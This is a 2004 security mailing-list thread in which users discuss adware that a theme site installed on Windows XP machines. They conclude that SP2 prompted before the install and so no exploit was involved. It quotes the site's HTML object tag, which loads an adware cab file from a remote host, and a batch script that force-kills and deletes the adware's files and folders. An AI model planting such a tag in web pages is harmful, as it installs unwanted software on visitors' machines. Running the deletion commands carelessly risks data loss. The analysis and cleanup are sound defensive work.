RE: Spyware installs ... XP SP2 box

["Geraldo Rivera" <iamafraud () hotmail com>]

Thanks to everybody for all the info posted here. I wish I had a machine 
available right now to set up a vanilla SP2 install so I could witness the 
results of visiting the site again myself.

I did indeed say that I have visited the site in the past. However, I hadn't 
in a number of months prior to this visit. I also did not discover any 
adware/spyware that was installed on my machine prior to 10/2 (nor did 
ad-aware, spybot, or pest-patrol). I trust in the info that has been posted 
here, I just wish that I could witness it myself. I am very cautious when 
surfing (I know somebody is going to tell me not cautious enough since I am 
still using IE) so I am wondering what could have been installed prior to 
this visit that allowed this install to happen without any interaction.

Regardless, thanks again to everybody for the good info, and a big fuck you 
to themexp.org.


> From: "Castigliola, Angelo" <ACastigliola () unumprovident com>
> To: "raize" <raize () gravito com>, <full-disclosure () lists netsys com>
> Subject: RE: [Full-disclosure] Spyware installs ... XP SP2 box
> Date: Tue, 5 Oct 2004 12:11:24 -0400
>
> Thank you for the test Raize. I appreciate your time.
>
> >One must assume that you are installing these "theme packs" via some
> BHO (Browser Helper Object) that you
> >installed previously or put the site on the "Always trust content from
> this provider". Perhaps someone
> >else can explain where I am missing the exploit, because a quick glance
> over seems to indicate there is
> >none for XP SP2. (I did not test this on SP1)
>
> I think you are right. It seems the only person that was not prompted
> for the install that was not running SP2 was the original author of this
> thread who said that it was a previously visited site.
>
> As far as users running SP1 there is no security warning that says an
> executable is about to be installed. There is no Microsoft Update that
> will prevent this from loading. Like most large organizations just
> jumping to SP2 is not an option. It needs go though rigorous testing to
> make sure it complies with all of our internal software.
>
> Angelo Castigliola III
> Operations Technical Analyst I
> UnumProvident IT Services
> 207.575.3820
> -----Original Message-----
> From: full-disclosure-admin () lists netsys com
> [mailto:full-disclosure-admin () lists netsys com] On Behalf Of raize
> Sent: Tuesday, October 05, 2004 9:29 AM
> To: full-disclosure () lists netsys com
> Subject: Re: [Full-disclosure] Spyware installs ... XP SP2 box
>
>
> The installed code is definitely:
>
> <object id="DDownload_UL1"
> classid="clsid:00000EF1-0786-4633-87C6-1AA7A44296DA"
> codebase="http://www.addictivetechnologies.net/DM0/cab/ATPartners.cab";
> HEIGHT=0 WIDTH=0></object>
>
> However, there is no exploit here. I loaded this with a default honeypot
> image of XPSP2 with IE as an Admin and nothing else installed other than
> the drop down that asked me if I really wanted to trust this site for
> installing an executable.
>
> One must assume that you are installing these "theme packs" via some BHO
> (Browser Helper Object) that you installed previously or put the site on
> the "Always trust content from this provider". Perhaps someone else can
> explain where I am missing the exploit, because a quick glance over
> seems to indicate there is none for XP SP2. (I did not test this on SP1)
>
> Spybot and Ad-aware do not catch and kill WinRebates and WinAd
> spy/adware properly, but I have a batch command that will do it for you.
> Included is a .zip of each IP contacted along with full URL request and
> output. It also contains the contents of this email and the batch file
> with these commands: (You'll want to rename the .txt to .bat)
>
> --------------------------------------------
> cd "C:\Program Files\Winad Client"
> taskkill /T /F /IM WinClt.exe
> taskkill /T /F /IM WinAd.exe
> erase WinClt.exe
> erase WinAd.exe
> cd ..
> cd Web_Rebates
> taskkill /T /F /IM WebRebates0.exe
> taskkill /T /F /IM WebRebates1.exe
> erase WebRebates0.exe
> erase WebRebates1.exe
> cd ..
> rd /Q /S "Winad Client"
> rd /Q /S "Web_Rebates"
> cd "C:\Windows\system32"
> taskkill /T /F /IM fjdria.exe
> taskkill /T /F /IM ezSP_Px.exe
> erase fjdria.exe
> erase ezSP_Px.exe
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html

_________________________________________________________________
Express yourself instantly with MSN Messenger! Download today - it's FREE! 
hthttp://messenger.msn.click-url.com/go/onm00200471ave/direct/01/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html